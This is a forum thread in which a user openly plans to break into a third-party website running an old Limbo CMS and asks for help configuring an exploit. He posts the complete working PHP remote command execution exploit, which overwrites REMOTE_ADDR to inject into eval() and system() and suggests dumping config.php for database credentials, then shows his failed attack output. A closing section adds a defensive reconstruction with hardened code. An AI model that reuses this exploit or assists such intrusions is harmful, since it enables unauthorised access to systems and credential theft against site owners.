exploit limbo

krzywomordus

User
Joined
June 18, 2007
Posts
4
I know a site that runs a veeeery old Limbo, and I want to show them it's time to change that XD
I also have a nice exploit.php; I filled in all the fields except "send exploit through an HTTP proxy (ip:port)".
Should I enter my own IP (i.e. the server I'm doing this from)?
The IP of the site I want to break into?
I won't ask about this on other forums, because their rules forbid it, but here I think I can XD.
So?

regards

____________krzywomordus
 

krzywomordus

User
Joined
June 18, 2007
Posts
4
I know what that means ;]
But:
What does "find yourself a proxy at" at the bottom mean? In the "Check Proxy" field, do I enter the IP of the server with the old Limbo and just guess the proxy?
Do I enter my own IP and also guess the proxy?
What do I enter, and where?
What is the proxy even for :kreci: ? ;]

______________
krzywomordus
 

krzywomordus

User
Joined
June 18, 2007
Posts
4
But the problem is that I'm not doing the break-in from my own computer... I'd need Apache and PHP for that, and I don't feel like messing with it, so I'm doing it from another server (I uploaded the files there via FTP)...
Do I absolutely have to enter something in that field?
When I leave it empty, the 'break-in' fails.
And I don't have physical access to that server; I'm doing this through the admin panel.

EDIT: OK, now I know what it's about, but when I enter a WORKING proxy, it still won't go
 

krzywomordus

User
Joined
June 18, 2007
Posts
4
Originally posted by sinis
Hmmm... Post the code of that exploit here.

Here you go:

Code:
<?php

#  ---limbo_1042_eval_xpl.php                             16.03 14/12/2005     #
#                                                                              #
#  Limbo <= 1.0.4.2 _SERVER[REMOTE_ADDR] overwrite/ remote cmmnds xctn         #
#                              coded by rgod                                   #
#                    site: http://rgod.altervista.org                          #
#                                                                              #
#  -> this works with register_globals off & regardless of magic_quotes_gpc    #
#  settings                                                                    #
#  usage: launch from Apache, fill in requested fields, then go!               #
#                                                                              #
#  Sun-Tzu: "Humble words and increased preparations are signs that the enemy  #
#  is about to advance.  Violent language and driving forward as if to the     #
#  attack are signs that he will retreat."                                     #

error_reporting(0);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 5);
ob_implicit_flush(1);

echo '<html><head><title>Limbo <= 1.0.4.2 _SERVER[REMOTE_ADDR] remote cmmnds xctn
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"><!-- body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111;} body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important} h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
Limbo <= 1.0.4.2 _SERVER[REMOTE_ADDR] remote cmmnds xctn</p><p class="Stile6"> a
script by rgod at <a href="http://rgod.altervista.org" target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"><form
name="form1" method="post" action="' . htmlspecialchars($_SERVER['PHP_SELF']) . '">
<p class="Stile5"><input type="text" name="host"> * hostname (ex: www.sitename.com)</p>
<p class="Stile5"><input type="text" name="path"> * path (ex: /limbo/ or just / )</p>
<p class="Stile5"><input type="text" name="command"> * specify a command ("cat config.php" to see database username &amp; password)</p>
<p class="Stile5"><input type="text" name="port"> specify a port other than 80 (default value)</p>
<p class="Stile5"><input type="text" name="proxy"> send exploit through an HTTP proxy (ip:port)</p>
<p class="Stile5"><input type="submit" name="Submit" value="go!"></p>
</form></td></tr></table></body></html>';

// Dump the raw request as a hex table, 16 bytes per row, with the printable
// characters of each row echoed to its right.
function show($headeri)
{
    $ii = 0;
    $ji = 0;
    $ki = 0;
    $ci = 0;
    echo '<table border="0"><tr>';
    while ($ii <= strlen($headeri) - 1) {
        $datai = dechex(ord($headeri[$ii]));
        if ($ji == 16) {
            $ji = 0;
            $ci++;
            echo "<td></td>";
            for ($li = 0; $li <= 15; $li++) {
                echo "<td>" . htmlentities($headeri[$li + $ki]) . "</td>";
            }
            $ki = $ki + 16;
            echo "</tr><tr>";
        }
        if (strlen($datai) == 1) {
            echo "<td>0" . $datai . "</td>";
        } else {
            echo "<td>" . $datai . "</td> ";
        }
        $ii++;
        $ji++;
    }
    // pad the last row, then print its characters
    for ($li = 1; $li <= (16 - (strlen($headeri) % 16) + 1); $li++) {
        echo "<td>&nbsp;&nbsp;</td>";
    }
    for ($li = $ci * 16; $li < strlen($headeri); $li++) {
        echo "<td>" . htmlentities($headeri[$li]) . "</td>";
    }
    echo "</tr></table>";
}

// proxy must be given as dotted-quad ip:port
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}\b)';

// if you have the sockets module loaded, 2x speed! if not, load the next
// function to send packets (sendpacketii() is the one actually called below)
function sendpacket()
{
    global $proxy, $host, $port, $packet, $html, $proxy_regex;
    $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    if ($socket === false) {
        echo "socket_create() failed: reason: " . socket_strerror(socket_last_error()) . "\r\n";
        return;
    }
    if ($proxy <> '' and !preg_match($proxy_regex, $proxy)) {
        echo 'Not a valid proxy...';
        die;
    }
    echo "OK.\r\n";
    echo "Attempting to connect to " . $host . " on port " . $port . "...\r\n";
    if ($proxy == '') {
        $result = socket_connect($socket, gethostbyname($host), $port);
    } else {
        $parts = explode(':', $proxy);
        echo 'Connecting to ' . $parts[0] . ':' . $parts[1] . " proxy...\r\n";
        $result = socket_connect($socket, $parts[0], (int) $parts[1]);
    }
    if ($result === false) {
        echo "socket_connect() failed.\r\nReason: " . socket_strerror(socket_last_error($socket)) . "\r\n";
    } else {
        echo "OK.\r\n";
        $html = '';
        socket_write($socket, $packet, strlen($packet));
        echo "Reading response:\r\n";
        while ($out = socket_read($socket, 2048)) {
            $html .= $out;
        }
        echo nl2br(htmlentities($html));
        echo "Closing socket...";
        socket_close($socket);
    }
}

// fsockopen() fallback: connect either to the target directly or to the
// HTTP proxy, send the raw request and read the whole response into $html
function sendpacketii($packet)
{
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy == '') {
        $ock = fsockopen(gethostbyname($host), $port);
        if (!$ock) {
            echo 'No response from ' . htmlentities($host);
            die;
        }
    } else {
        if (!preg_match($proxy_regex, $proxy)) {
            echo 'Not a valid proxy...';
            die;
        }
        $parts = explode(':', $proxy);
        echo 'Connecting to ' . $parts[0] . ':' . $parts[1] . " proxy...\r\n";
        $ock = fsockopen($parts[0], (int) $parts[1]);
        if (!$ock) {
            echo 'No response from proxy...';
            die;
        }
    }
    fputs($ock, $packet);
    $html = '';
    // "Connection: Close" is requested, so the server closes after the response
    while (!feof($ock)) {
        $html .= fgets($ock);
    }
    fclose($ock);
    echo nl2br(htmlentities($html));
}

$host    = $_POST['host'] ?? '';
$path    = $_POST['path'] ?? '';
$command = $_POST['command'] ?? '';
$port    = $_POST['port'] ?? '';
$proxy   = $_POST['proxy'] ?? '';

if (($host <> '') and ($path <> '') and ($command <> '')) {
    $port = intval(trim($port));
    if ($port == 0) {
        $port = 80;
    }
    if (($path[0] <> '/') or ($path[strlen($path) - 1] <> '/')) {
        echo 'Error... check the path!';
        die;
    }
    // when going through a proxy the request line carries the absolute URL
    if ($proxy == '') {
        $p = $path;
    } else {
        $p = 'http://' . $host . ':' . $port . $path;
    }
    $host = str_replace("\r\n", "", $host);
    $path = str_replace("\r\n", "", $path);
    # STEP X -> one and unique...
    # we overwrite ip address, include classes/adodbt/read_table.php and pass commands to an eval()
    # the payload opens with '. and closes with .' so that it breaks out of the
    # single-quoted string the address is placed in; the shell command itself
    # travels in the cmd parameter and system() runs it inside the eval()
    $SHELL = "'.ini_set(\"max_execution_time\",0).system(\$_GET[cmd]).die('HiMaster!').'";
    $SHELL = urlencode($SHELL);
    $packet  = "GET " . $p . "index2.php?cmd=" . urlencode($command) . "&_SERVER[]=&_SERVER[REMOTE_ADDR]=";
    $packet .= $SHELL;
    $packet .= "&option=wrapper&module[module]=1 HTTP/1.1\r\n";
    $packet .= "User-Agent: Googlebot/2.1\r\n";
    $packet .= "Host: " . $host . "\r\n";
    $packet .= "Connection: Close\r\n\r\n";
    show($packet);
    sendpacketii($packet);
    // die('HiMaster!') in the payload marks a successful eval()
    if (stripos($html, "HiMaster!") !== false) {
        echo "Exploit succeeded...";
    } else {
        echo "Exploit failed...";
    }
} else {
    echo "Fill * required fields, optionally specify a proxy...";
}
?>



# milw0rm.com [2005-12-14]

[ Added: 13-03-2008, 18:28 ]
It almost worked: I used some working proxy, but unfortunately it throws
Connecting to 85.214.77.184:80 proxy...
HTTP/1.1 401 Unauthorized
Connection: close
WWW-Authenticate: Basic realm="Password protected area"
Content-Type: text/html
Content-Length: 351
Date: Thu, 13 Mar 2008 17:29:25 GMT
Server: lighttpd/1.4.13

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>401 - Unauthorized</title>
</head>
<body>
<h1>401 - Unauthorized</h1>
</body>
</html>
Exploit failed... # milw0rm.com [2005-12-14]

And I already thought it would work... ;]
 
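The exploit posted above chains two things: a request parameter named `_SERVER[REMOTE_ADDR]` that ends up replacing the real `$_SERVER['REMOTE_ADDR']`, and an `eval()` into which that address is spliced as a single-quoted string, which is why the payload opens with `'.` and closes with `.'`. The PHP below is an added example, not Limbo's or rgod's code, reconstructing both conditions in the smallest form that still fails the same way, each beside a hardened version. The function names, the shape of the generated code and the "register_globals emulation" loop are assumptions made here for illustration; the only details taken from the exploit are the parameter name and the payload shape. It runs offline with a constructed query string and a harmless marker instead of `system()`.

```php
<?php
// Added example (not Limbo's or rgod's code): the two conditions the Limbo
// exploit relies on, each beside a fix. Function names and the eval()'d code
// shape are assumptions; the parameter name _SERVER[REMOTE_ADDR] and the
// '.<calls>.' payload shape come from the exploit.

// --- Condition 1: request variables copied into the global scope -----------
// PHP parses "_SERVER[]=&_SERVER[REMOTE_ADDR]=x" into
// $_GET['_SERVER'] = [0 => '', 'REMOTE_ADDR' => 'x']. A register_globals-style
// import that writes every request key into $GLOBALS therefore replaces the
// real $_SERVER superglobal with attacker-controlled data.
function import_request_vars_vulnerable(array $request): void
{
    foreach ($request as $key => $value) {
        $GLOBALS[$key] = $value;          // $GLOBALS['_SERVER'] is the superglobal
    }
}

// Fix: request data must never choose the variable it lands in. Read only a
// whitelist of keys into a local array; superglobals are never writable here.
function import_request_vars_hardened(array $request, array $allowed): array
{
    $vars = [];
    foreach ($allowed as $key) {
        if (isset($request[$key]) && is_string($request[$key])) {
            $vars[$key] = $request[$key];
        }
    }
    return $vars;
}

// --- Condition 2: request-derived text spliced into code for eval() --------
// A value beginning with '. and ending with .' closes the literal and turns
// everything in between into executed expressions.
function build_code_vulnerable(string $addr): string
{
    return "\$ip = '" . $addr . "';";
}

// Fix: validate the value, and if code generation is unavoidable, let
// var_export() produce a properly escaped PHP literal instead of gluing text.
function build_code_hardened(string $addr): string
{
    if (filter_var($addr, FILTER_VALIDATE_IP) === false) {
        throw new InvalidArgumentException('REMOTE_ADDR is not an IP address');
    }
    return '$ip = ' . var_export($addr, true) . ';';
}

// Constructed query string mirroring the exploit's, with a marker assignment
// in place of system(): if it runs, $GLOBALS['pwned'] flips to true.
parse_str('cmd=id&_SERVER[]=&_SERVER[REMOTE_ADDR]='
        . urlencode("'.(\$GLOBALS['pwned'] = true).'")
        . '&option=wrapper&module[module]=1', $request);

// Vulnerable path: the import clobbers $_SERVER, the eval() runs the payload.
$GLOBALS['pwned'] = false;
import_request_vars_vulnerable($request);
$code = build_code_vulnerable($_SERVER['REMOTE_ADDR']);
echo "generated code: $code\n";
eval($code);
echo 'vulnerable path: pwned = ' . var_export($GLOBALS['pwned'], true) . "\n";

// Hardened path: $_SERVER keeps what the web server set (assumed value here),
// the payload never reaches eval() as code, and a non-IP value is rejected.
$_SERVER['REMOTE_ADDR'] = '203.0.113.7';
$GLOBALS['pwned'] = false;
$vars = import_request_vars_hardened($request, ['cmd', 'option']);
eval(build_code_hardened($_SERVER['REMOTE_ADDR']));
echo 'hardened path: ip = ' . $ip . ', pwned = ' . var_export($GLOBALS['pwned'], true) . "\n";
try {
    build_code_hardened($request['_SERVER']['REMOTE_ADDR']);
} catch (InvalidArgumentException $e) {
    echo 'hardened path rejected payload: ' . $e->getMessage() . "\n";
}
```

Run it with `php` on the command line; the vulnerable branch prints `pwned = true`, the hardened branch prints the server-set address with `pwned = false` and then the rejection message. The practical lesson for anyone maintaining a site like the one in this thread is that the proxy question is irrelevant to the fix: what has to go is the import of request keys into globals and any `eval()` fed with request-derived strings.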